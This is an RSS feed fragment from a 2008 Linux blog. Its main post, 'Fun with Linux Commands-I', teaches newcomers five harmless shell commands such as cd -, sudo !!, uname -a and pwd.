<li><span style="color: #ff6600;"><a href="http://polishlinux.org/kde/quick-look-at-kde-42-svn/" onclick="javascript:pageTracker._trackPageview('/outbound/article/polishlinux.org');" target="_blank">Quick Look at KDE 4.2-SVN</a></span></li>
<li><span style="color: #ff6600;"><a href="http://prosenjit23.wordpress.com/2008/10/17/switch-to-ubuntu-linux-not-apple-mac-os/" onclick="javascript:pageTracker._trackPageview('/outbound/article/prosenjit23.wordpress.com');" target="_blank">Switch to Ubuntu Linux not Apple Mac OS</a></span></li>
<li><span style="color: #ff6600;"><a href="http://www.junauza.com/2008/02/freeopen-source-digital-audio-editors.html" onclick="javascript:pageTracker._trackPageview('/outbound/article/www.junauza.com');" target="_blank">Free/Open-source Digital Audio Editors</a></span></li>
<li><span style="color: #ff6600;"><a href="http://www.linuxtoday.com/infrastructure/2008101703035OPBZCY" onclick="javascript:pageTracker._trackPageview('/outbound/article/www.linuxtoday.com');" target="_blank">Professional-Level Photography With Linux, And Nobody Goes To Jail </a></span></li>
</ul>
<p><map name='google_ad_map_215_4dd546a088e8e37f'>
<area shape='rect' href='http://imageads.googleadservices.com/pagead/imgclick/215?pos=0' coords='1,2,367,28' />
<area shape='rect' href='http://services.google.com/feedback/abg' coords='384,10,453,23'/></map>
<img usemap='#google_ad_map_215_4dd546a088e8e37f' border='0' src='http://imageads.googleadservices.com/pagead/ads?format=468x30_aff_img&amp;client=&amp;channel=&amp;output=png&amp;cuid=215&amp;url= http%3A%2F%2Fwww.quicktweaks.com%2F2008%2F10%2F17%2Flinux-talks-they-talked-about-linux%2F' /></p>

<p>Related posts:<ol><li><a href='http://www.quicktweaks.com/2008/10/24/linux-talks-they-talked-about-linux-2/' rel='bookmark' title='Permanent Link: Linux Talks: They talked about Linux'>Linux Talks: They talked about Linux</a> <small>Some links for this weekend: 5 Wallpaper Changer Apps For...</small></li><li><a href='http://www.quicktweaks.com/2008/10/01/power-of-wonderful-linux-terminal-10-challenges-for-windows-users/' rel='bookmark' title='Permanent Link: Power of Wonderful Linux Terminal - 10 Challenges for Windows Users'>Power of Wonderful Linux Terminal - 10 Challenges for Windows Users</a> <small>Enough said about Linux being free. You shouldn’t use anything...</small></li><li><a href='http://www.quicktweaks.com/2008/10/12/switch-to-linux-today-bsod-linux-flier/' rel='bookmark' title='Permanent Link: Switch to Linux Today! bsod Linux Flier'>Switch to Linux Today! bsod Linux Flier</a> <small>There are many reasons to switch to Linux, but this...</small></li></ol></p>
<p>Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>
<p><a href="http://feeds.feedburner.com/~a/quicktweaks/myFe?a=fMKKFk"><img src="http://feeds.feedburner.com/~a/quicktweaks/myFe?i=fMKKFk" border="0"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~f/quicktweaks/myFe?a=duDaM"><img src="http://feeds.feedburner.com/~f/quicktweaks/myFe?i=duDaM" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/quicktweaks/myFe?a=qRJbm"><img src="http://feeds.feedburner.com/~f/quicktweaks/myFe?i=qRJbm" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/quicktweaks/myFe?a=t1YrM"><img src="http://feeds.feedburner.com/~f/quicktweaks/myFe?i=t1YrM" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/quicktweaks/myFe?a=fLYgm"><img src="http://feeds.feedburner.com/~f/quicktweaks/myFe?i=fLYgm" border="0"></img></a>
</div>]]></content:encoded>
			<wfw:commentRss>http://www.quicktweaks.com/2008/10/17/linux-talks-they-talked-about-linux/feed/</wfw:commentRss>
		<feedburner:origLink>http://www.quicktweaks.com/2008/10/17/linux-talks-they-talked-about-linux/</feedburner:origLink></item>
		<item>
		<title>Fun with Linux Commands-I</title>
		<link>http://feeds.feedburner.com/~r/quicktweaks/myFe/~3/423495819/</link>
		<comments>http://www.quicktweaks.com/2008/10/17/fun-with-linux-commands-i/#comments</comments>
		<pubDate>Fri, 17 Oct 2008 08:13:02 +0000</pubDate>
		<dc:creator>ashokgelal</dc:creator>
		
		<category><![CDATA[Linux]]></category>

		<category><![CDATA[TerminalFunFive]]></category>

		<guid isPermaLink="false">http://www.quicktweaks.com/?p=213</guid>
		<description><![CDATA[This post will serve two purposes: to learn some Linux commands in a fun way without putting so much load on your memory power, and to realize the power of wonderful Linux commands.


Related posts:<ol><li><a href='http://www.quicktweaks.com/2008/11/01/fun-with-linux-commands-iii-being-productive/' rel='bookmark' title='Permanent Link: Fun with Linux Commands-III - Being productive'>Fun with Linux Commands-III - Being productive</a> <small>Happy Linux commanding! Who says Linux commands are just for...</small></li><li><a href='http://www.quicktweaks.com/2008/10/24/fun-with-linux-commands-ii-with-power-comes-responsibility/' rel='bookmark' title='Permanent Link: Fun with Linux Commands-II - With Power Comes Responsibility'>Fun with Linux Commands-II - With Power Comes Responsibility</a> <small>Happy Linux Commanding! But be careful! The heading is self-explanatory....</small></li><li><a href='http://www.quicktweaks.com/2008/10/01/power-of-wonderful-linux-terminal-10-challenges-for-windows-users/' rel='bookmark' title='Permanent Link: Power of Wonderful Linux Terminal - 10 Challenges for Windows Users'>Power of Wonderful Linux Terminal - 10 Challenges for Windows Users</a> <small>Enough said about Linux being free. You shouldn’t use anything...</small></li></ol>

Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description>
			<content:encoded><![CDATA[<p>Happy Linux Commanding!</p>
<p>From now onwards I will be posting 5 Linux commands weekly and mostly targeted to Linux newbies or to those who are not much comfortable with Linux commands. This post will serve two purposes: to learn Linux commands in a fun way without putting so much load on your memory power (that&#8217;s why I will post only five commands), and to realize the power of wonderful Linux commands. You might be already familiar with some of the commands and you might be hearing some of the commands for the first time; some of the commands might be very useful and some might be just for fun. This post will appear on Fridays so that you can have some &#8216;useful&#8217; fun on weekends. If you know any Linux commands which are fun/crappy/useful/dangerous, don&#8217;t forget to share with us. Just drop them in comments or shoot me an email.</p>
<p><span id="more-213"></span></p>
<p>1. Want your computer speak the current time?</p>
<p><code>$ saytime</code></p>
<p>This command says the current system in a male voice. You can even record your own voice. Just have a look at /user/share/saytime where all the sound files are stored. If you are ambitious, you can write a shell script to set up an alarm which will say the time.</p>
<p>2. Toggle between directories</p>
<p><code>$ cd -</code></p>
<p>If you are working in two directories, this command comes very handy. It toggles between the current directory and the last directory you were in.</p>
<p>3. Repeat the last executed command</p>
<p><code>$ !!</code></p>
<p>When is this useful? If you are writing a shell script and want to execute a command twice. Another case where it comes handy is you forgot to add something in front of a long command such as <code>apt-get install foo foo1 foo2 foo3 foo4 foo5</code>. You need to execute <em>apt-get</em> command as <em>sudo</em>. To execute this command again with <em>sudo</em>, issue:</p>
<p><code>$ sudo !!</code></p>
<p>4. Which Linux kernel are you using?</p>
<p><code>$ uname -a</code></p>
<p>5. Where are you at?</p>
<p><code>$ pwd</code></p>
<p>I hope this was fun and/or helpful. Try them a couple of times, then take a long breathe, and feel comfortable. You learned five Linux commands today this week. Keep coming back to become a Linux Terminal Guru!</p>
<p><map name='google_ad_map_213_4dd546a088e8e37f'>
<area shape='rect' href='http://imageads.googleadservices.com/pagead/imgclick/213?pos=0' coords='1,2,367,28' />
<area shape='rect' href='http://services.google.com/feedback/abg' coords='384,10,453,23'/></map>
<img usemap='#google_ad_map_213_4dd546a088e8e37f' border='0' src='http://imageads.googleadservices.com/pagead/ads?format=468x30_aff_img&amp;client=&amp;channel=&amp;output=png&amp;cuid=213&amp;url= http%3A%2F%2Fwww.quicktweaks.com%2F2008%2F10%2F17%2Ffun-with-linux-commands-i%2F' /></p>

<p>Related posts:<ol><li><a href='http://www.quicktweaks.com/2008/11/01/fun-with-linux-commands-iii-being-productive/' rel='bookmark' title='Permanent Link: Fun with Linux Commands-III - Being productive'>Fun with Linux Commands-III - Being productive</a> <small>Happy Linux commanding! Who says Linux commands are just for...</small></li><li><a href='http://www.quicktweaks.com/2008/10/24/fun-with-linux-commands-ii-with-power-comes-responsibility/' rel='bookmark' title='Permanent Link: Fun with Linux Commands-II - With Power Comes Responsibility'>Fun with Linux Commands-II - With Power Comes Responsibility</a> <small>Happy Linux Commanding! But be careful! The heading is self-explanatory....</small></li><li><a href='http://www.quicktweaks.com/2008/10/01/power-of-wonderful-linux-terminal-10-challenges-for-windows-users/' rel='bookmark' title='Permanent Link: Power of Wonderful Linux Terminal - 10 Challenges for Windows Users'>Power of Wonderful Linux Terminal - 10 Challenges for Windows Users</a> <small>Enough said about Linux being free. You shouldn’t use anything...</small></li></ol></p>
<p>Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>
<p><a href="http://feeds.feedburner.com/~a/quicktweaks/myFe?a=kZWmQM"><img src="http://feeds.feedburner.com/~a/quicktweaks/myFe?i=kZWmQM" border="0"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~f/quicktweaks/myFe?a=n7PaM"><img src="http://feeds.feedburner.com/~f/quicktweaks/myFe?i=n7PaM" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/quicktweaks/myFe?a=VjPbm"><img src="http://feeds.feedburner.com/~f/quicktweaks/myFe?i=VjPbm" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/quicktweaks/myFe?a=TG55M"><img src="http://feeds.feedburner.com/~f/quicktweaks/myFe?i=TG55M" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/quicktweaks/myFe?a=chMSm"><img src="http://feeds.feedburner.com/~f/quicktweaks/myFe?i=chMSm" border="0"></img></a>
</div>]]></content:encoded>
			<wfw:commentRss>http://www.quicktweaks.com/2008/10/17/fun-with-linux-commands-i/feed/</wfw:commentRss>
		<feedburner:origLink>http://www.quicktweaks.com/2008/10/17/fun-with-linux-commands-i/</feedburner:origLink></item>
	</channel>
</rss><!-- Dynamic Page Served (once) in 2.165 seconds --><!-- Cached page served by WP-Super-Cache --><!-- Compression = gzip -->
